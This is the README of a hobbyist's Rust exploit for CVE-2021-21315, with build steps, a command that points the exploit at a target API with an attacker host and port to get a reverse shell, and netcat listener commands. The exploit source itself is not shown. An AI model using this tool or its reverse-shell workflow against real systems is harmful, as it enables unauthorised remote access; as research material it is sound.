rust noob tried write easy exploit code with rust lang# the CVE-2021-21315's exploit code wrote with Rust lang
I'm rust noob so this code was my part of RustLang practices
Yes!!Let's Get the reverse shell!!!!!!!!!!
[!]for education or researching only
# Build
```
cargo build
```
# Usage
```
./exploit <targetURL/path/of/api> <LHOST> <LPORT>
./exploit http://target.com/api/osinfo?param 172.17.2.1 1234
```
# need Netcat for Listener to catch reverse shell
```
nc -nlvp <lport>
nc -nlvp 1234
```

[4.0K] /data/pocs/ac97714cb3d814b0c8d5e6cae881b1210b26b19c
├── [ 273] Cargo.toml
├── [ 560] README.md
└── [4.0K] src
└── [4.3K] main.rs
1 directory, 3 files